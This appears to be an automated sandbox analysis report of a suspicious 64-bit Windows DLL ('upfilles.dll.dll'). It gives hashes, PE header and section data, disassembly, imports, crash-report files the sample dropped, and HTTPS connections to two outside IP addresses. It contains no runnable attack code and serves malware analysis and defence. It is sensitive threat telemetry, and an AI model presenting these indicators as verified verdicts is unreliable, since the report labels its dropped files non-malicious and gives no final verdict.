                                                                                                              SHA-512:1852341A694CC87F021633950EA49ECE0FDC5D470769097BE801C9F5F525F77E075FF0F4FC9BAE3266E303161AB520D0DEFF756C4B6DF3F6CF50F20AD73A052C
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):57494
                                                                                                              Entropy (8bit):1.6234250646337964
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:duYrC6W3OMlUsn9pHz+bF7frc/wHGpzp/iaBReJd5U6:rhZgV9lxXpzp/9jePL
                                                                                                              MD5:66F2A3C376DA0D558312FF6110D838C3
                                                                                                              SHA1:834B317025A81AA5E7F00DF4430D56F7D760645B
                                                                                                              SHA-256:562F917C37C8D1E62F2E934483DEF3B9032D3EDBDE40154FD19E1CEA1BE2BAF2
                                                                                                              SHA-512:58CC96682B33937C6CBB1E4CA8C0F7A07A37CD327DF704A9149CEAD1272E8F4C2539691B2C8FA46B75BB017353F11C02BD129EFE4159EE3081DF67D534CB974C
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...........................T...........@...............................................................................eJ..............Lw......................T.......h....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8522
                                                                                                              Entropy (8bit):3.6962697567258553
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJtabmV6Y7pGgmfWP3prM89b+rWfxKm:R6lXJwbmV6YFGgmfWPT+6fd
                                                                                                              MD5:B71FE5E91F46A2F6E80793B28555315E
                                                                                                              SHA1:52F0EE991F743BEA0995768C5AA075635A979098
                                                                                                              SHA-256:7F8F6E795A696CA77E094A9664C2A6B795FFB3C2E9A5A6AEF1ED303C408F7EA0
                                                                                                              SHA-512:5CE960EE43F0BD8BEE75A7688B62FD8BD51F4CE59AF84251C28867D7FD5E54FF5E03D2D159A5C36D8B04415FB04CF4EA130D1036D1D8DC564B5B2F961FFE0203
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.2.<./.P.i.
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.478653683433715
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYpYm8M4JCNCF0laFniyq85mQCypptSTS6d:uIjfqI7+b7V1JilVGTppoO6d
                                                                                                              MD5:DA7D9A451274291EFD3755DC8FC3A141
                                                                                                              SHA1:51E42DA26BBC94435F94EFDBDF8A242CC744E57C
                                                                                                              SHA-256:821799E5797BB8E3BCB45C123C170C09004DB0C21BB4FC46A6F6A99DE66FFC12
                                                                                                              SHA-512:1AADD5F0D59B95756B48DFE2F6F95D358774409C5E209449411050C86A5F3990AE52D7AA1BBDD93063D712B6CB0DC84BE371833813004423128DF6949663B53A
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):54894
                                                                                                              Entropy (8bit):1.6839237359198767
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:59S8veE3+XuQRawUKUCGsV3bBvgoi7MxpnZ0mK1NX7RT9bCmYhJbqmpx5OqWRW/F:diYrCrOMzuJXeDwwx5OLIH9EyXh
                                                                                                              MD5:A837E0375D7983509A56860346CFCC15
                                                                                                              SHA1:F75FAE2A056C6FEF8D8F1D700F3412213DFFFB2D
                                                                                                              SHA-256:205CD9270682DC17A83E8D40610371F3ED964DD319E67BDBA4BE1780DF36D02F
                                                                                                              SHA-512:DAD398EB6A465DF561E9F4A51FD2D414C84CFFB7F34BC06FEE2515B88EDCAC48978359ADA324F8A441AE9304221089DF081651A0CC5B770D121A04ED586B5A4A
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...............v...........T...........@...............................................................................eJ..............Lw......................T.......x....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8522
                                                                                                              Entropy (8bit):3.6958245523678235
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJoigmd6Y7GGgmfWfiwsprH89b+vWfuKm:R6lXJdgmd6Y6GgmfWq2+ef6
                                                                                                              MD5:57975B44072D1C9B3E80DB2266217745
                                                                                                              SHA1:A9CF9831C70448BFE57EB598D192F042A2AE3A6D
                                                                                                              SHA-256:415AD9CE27C4A61A389B2D2AE85DF89BB06FEFD9971BDB3399CAE445E58B8910
                                                                                                              SHA-512:93854E117CDB0F89602B01AA667CE2E15D7607242C6EC26A4B7060F5FCB7EB905ADB72A73E979F8B35E01DA8F21F8CEE3A99D7FA40DD04ABBBD3428F6F83C212
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.8.<./.P.i.
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.481691067176541
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYSYm8M4JCNCF0saFBwtjyq85mQCrdptSTSNd:uIjfqI7+b7VCJiP0GqpoONd
                                                                                                              MD5:243DA7FD47223239375D054C23BDE13D
                                                                                                              SHA1:01345C28EFD562EEDE44945D9F8B54A30951ABC4
                                                                                                              SHA-256:CF4636B318E7DCECACDC72437D290E86C0501BCA90B77EE7585C1C837614D3D3
                                                                                                              SHA-512:9BCE637D0F2AA10F4FD3BE688AFC8B97DC87CD20E03157250D55EC6368C6E353BB80A712BA982C01CA00B082C593634FA65DC3295A1EF8F9DCAA3C69330CCD3F
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1835008
                                                                                                              Entropy (8bit):4.46640558354698
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:/IXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:wXD94zWlLZMM6YFHa+9
                                                                                                              MD5:B7B3B5CD7790EDF0686FF777BA5097D3
                                                                                                              SHA1:ED234CE4B519238F46F4AA9519B3C51AFB301F20
                                                                                                              SHA-256:221475E4ACF30CBC675FA384CAE2C143B9C04EF7B913D8D65B0052080F31D095
                                                                                                              SHA-512:2F5813E176688BB57E91FD992373740377CDE50F0EBF56BD906A17D6325F158525F85FA13581310839B2EB9219FD5E6F03A3DE3E3E9A32CF3DAAC2D1BAE26831
                                                                                                              Malicious:false
                                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...%...............................................................................................................................................................................................................................................................................................................................................U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                              Entropy (8bit):7.38766220411242
                                                                                                              TrID:
                                                                                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                              • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                              • DOS Executable Generic (2002/1) 1.70%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                              File name:upfilles.dll.dll
                                                                                                              File size:520'704 bytes
                                                                                                              MD5:ccb6d3cb020f56758622911ddd2f1fcb
                                                                                                              SHA1:4a013f752c2bf84ca37e418175e0d9b6f61f636d
                                                                                                              SHA256:f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
                                                                                                              SHA512:6ed929967005eaa6407e273b53a1fedcb2b084d775bed17272fd05b1ce143dbf921ac201246dfbfdbe663c7351e44c12f162e6f03343548b69b5d4598bb3492e
                                                                                                              SSDEEP:12288:8XG3MpAOIQ1LjbJFqzqUtYP4VnRk62yoK2:SpAOfFJIq/Py8K2
                                                                                                              TLSH:4AB4BE4A37A80CB6E867C17D88634705E3B27D610761C6DF1290536F9F3BBD2663AB12
                                                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........C.s.". .". .". .D.!.". .D.!o". .J.!.". .J.!.". .J.!.". tK.!.". .D.!.". .D.!.". .". q". tK.!.". tK.!.". tK.!.". tK? .". ."W .".
                                                                                                              Icon Hash:7ae282899bbab082
                                                                                                              Entrypoint:0x18000e1c0
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x180000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                              Time Stamp:0x5C24FE09 [Thu Dec 27 16:30:01 2018 UTC]
                                                                                                              TLS Callbacks:0x80020fe0, 0x1
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:90ad3b5a283c3a333bb222c03419fb76
                                                                                                              Signature Valid:
                                                                                                              Signature Issuer:
                                                                                                              Signature Validation Error:
                                                                                                              Error Number:
                                                                                                              Not Before, Not After
                                                                                                                Subject Chain
                                                                                                                  Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:
Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007F611CBAF4F7h
call 00007F611CBAF8D0h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007F611CBAF384h
int3
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], ebp
push esi
push edi
inc ecx
push esi
dec eax
sub esp, 10h
xor ecx, ecx
mov dword ptr [00029DFEh], 00000002h
xor eax, eax
mov dword ptr [00029DEEh], 00000001h
cpuid
inc esp
mov edx, ecx
inc esp
mov ecx, edx
xor ecx, 444D4163h
xor edx, 69746E65h
mov ebp, ebx
inc ebp
xor ebx, ebx
xor ebp, 68747541h
inc esp
mov eax, ebx
or ebp, edx
inc esp
mov esi, eax
or ebp, ecx
inc ecx
xor ecx, 49656E69h
inc ecx
xor eax, 756E6547h
inc ecx
lea eax, dword ptr [ebx+01h]
xor ecx, ecx
inc ecx
xor edx, 6C65746Eh
cpuid
inc ebp
or eax, ecx
mov dword ptr [esp], eax
inc ebp
or eax, edx
mov dword ptr [esp+04h], ebx
mov esi, ecx
mov dword ptr [esp+08h], ecx
mov edi, eax
mov dword ptr [esp+00h], edx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x36de0 | 0xbc | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36e9c | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e000 | 0x1238 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3b000 | 0x22bc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3c400 | 0x3278 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x40000 | 0x8fc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x31570 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x316d0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x315d0 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x25000 | 0x3d8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x23a99 | 0x23c00 | 87bfc32636bf93aa5ba6a79278de1d82 | False | 0.5472779173951049 | data | 6.420263931637599 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x25000 | 0x12b20 | 0x12c00 | 0f7e92ec4b27ef7a718d78d4d512f916 | False | 0.4034114583333333 | OpenPGP Secret Key Version 3 | 4.778349716646358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x38000 | 0x2b34 | 0x1600 | a4dd3c567a44787ef36b75c1461eadc7 | False | 0.189453125 | data | 3.77323134284555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x3b000 | 0x22bc | 0x2400 | 4b6b0ab05d617b8443d04115ebcf4698 | False | 0.4678819444444444 | data | 5.261331885690949 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3e000 | 0x1238 | 0x1400 | 262a27cc3c07916543c338d007e971a7 | False | 0.3376953125 | data | 4.197268760185116 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x40000 | 0x8fc | 0xa00 | 029935b97db1b1dda5ddd384d84aface | False | 0.52734375 | data | 5.178504761959821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
hVr | 0x41000 | 0x43000 | 0x42e00 | b359e2ed16a1c00b78e0035c276c8cf4 | False | 0.9683703271028037 | data | 7.985612673503669 | IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
REGISTRY | 0x3e6c0 | 0xc | ASCII text, with CRLF line terminators | English | United States | 1.6666666666666667
REGISTRY | 0x3e598 | 0x125 | ASCII text, with CRLF line terminators | English | United States | 0.7747440273037542
REGISTRY | 0x3e6d0 | 0x1fc | ASCII text, with CRLF line terminators | English | United States | 0.5866141732283464
TYPELIB | 0x3e8d0 | 0x7b8 | data | English | United States | 0.31983805668016196
RT_STRING | 0x3f088 | 0x2c | data | English | United States | 0.5681818181818182
RT_VERSION | 0x3e200 | 0x398 | OpenPGP Public Key | English | United States | 0.45652173913043476
RT_MANIFEST | 0x3f0b8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | UnmapViewOfFile, FreeLibrary, GetModuleFileNameW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, LoadResource, SizeofResource, FindResourceW, lstrcmpiW, MultiByteToWideChar, MapViewOfFile, EncodePointer, EnterCriticalSection, LeaveCriticalSection, GetThreadLocale, SetThreadLocale, CreateFileW, GetFileSizeEx, CreateFileMappingW, GetCurrentThreadId, GetCurrentProcessId, DeleteCriticalSection, InitializeCriticalSectionEx, GetLastError, RaiseException, DecodePointer, CloseHandle, CreateEventW, OpenEventA, CreateEventA, WaitForSingleObjectEx, ResetEvent, SetEvent, WriteConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, LocalAlloc, SetLastError, LocalFree, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, HeapSize, HeapReAlloc, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, SetFilePointerEx, GetStringTypeW, SetStdHandle, FlushFileBuffers
USER32.dll | CharNextW
ADVAPI32.dll | RegQueryInfoKeyW, RegOpenKeyExW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, RegSetValueExW
ole32.dll | CoTaskMemRealloc, CoTaskMemFree, CoCreateInstance, StringFromGUID2, CoTaskMemAlloc
OLEAUT32.dll | VarUI4FromStr, SysFreeString, SysAllocString, SysStringLen, LoadTypeLib, RegisterTypeLib, UnRegisterTypeLib
ntdll.dll | NtRequestWaitReplyPort, NtConnectPort, NtClose, NtRequestPort, RtlCaptureContext, RtlLookupFunctionEntry, NtCreateSection, RtlVirtualUnwind, RtlNtStatusToDosError, RtlInitUnicodeString
Name | Ordinal | Address
DllCanUnloadNow | 1 | 0x18000b1c0
DllGetClassObject | 2 | 0x18000b060
DllInstall | 3 | 0x18000b350
stow | 4 | 0x18000b1f0
DllUnregisterServer | 5 | 0x18000b330
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 11, 2024 00:04:12.876111984 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:12.876151085 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:12.876234055 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:12.884301901 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:12.884325027 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.100040913 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.100138903 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.150934935 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.150954962 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.151766062 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.151813984 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.153366089 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.196130991 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.836091995 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.836138010 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.836318970 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.836368084 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.836373091 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.836404085 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.836424112 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.836445093 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:13.836451054 CEST | 443 | 49745 | 91.194.11.183 | 192.168.2.4
May 11, 2024 00:04:13.836477041 CEST | 49745 | 443 | 192.168.2.4 | 91.194.11.183
May 11, 2024 00:04:14.160665989 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:14.160695076 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:14.160757065 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:14.161567926 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:14.161585093 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:14.349921942 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:14.349992037 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:14.633188009 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:14.633209944 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:14.633583069 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:14.633660078 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:14.633950949 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:14.680125952 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.302793026 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.302824020 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.302925110 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.302937031 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.302953005 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.303011894 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.303020000 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.303076029 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.423475027 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
